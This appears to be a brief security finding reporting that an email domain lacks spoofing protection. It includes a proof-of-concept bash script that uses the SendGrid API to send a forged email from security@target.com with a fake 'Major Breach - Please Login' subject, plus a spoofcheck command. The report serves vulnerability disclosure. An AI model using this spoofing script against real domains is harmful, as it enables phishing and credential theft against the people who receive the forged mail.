Mail Server Misconfiguration - No Spoofing Protection on Email Domain
POC
Test spoofing with the following bash script
!/bin/sh
SGUSER="" SGPASS="" SGTO=testemailaccount@outlook.com SGTONAME='Test' SGFROM=security@target.com SGFROMNAME='Target Team' SGSUBJECT='Major Breach - Please Login to Change Password' SGTEXT="Good Evening,%0a%0aThis is a Spoofed Email. It could contain malicious files or links to trick your users into compromising their machines.%0a%0aBest Regards,%0a" curl -d "to=${SGTO}&toname=${SGTONAME}&fromname=${SGFROMNAME}&subject=${SGSUBJECT}&text=${SGTEXT}&from=${SGFROM}&apiuser=${SGUSER}&apikey=${SGPASS}" https://api.sendgrid.com/api/mail.send.json echo "\n"
python spoofcheck.py target.com
You can test if spoofing is legitimate by sending a spoofed email using Send Grid.
Impact
High
Likelihood
High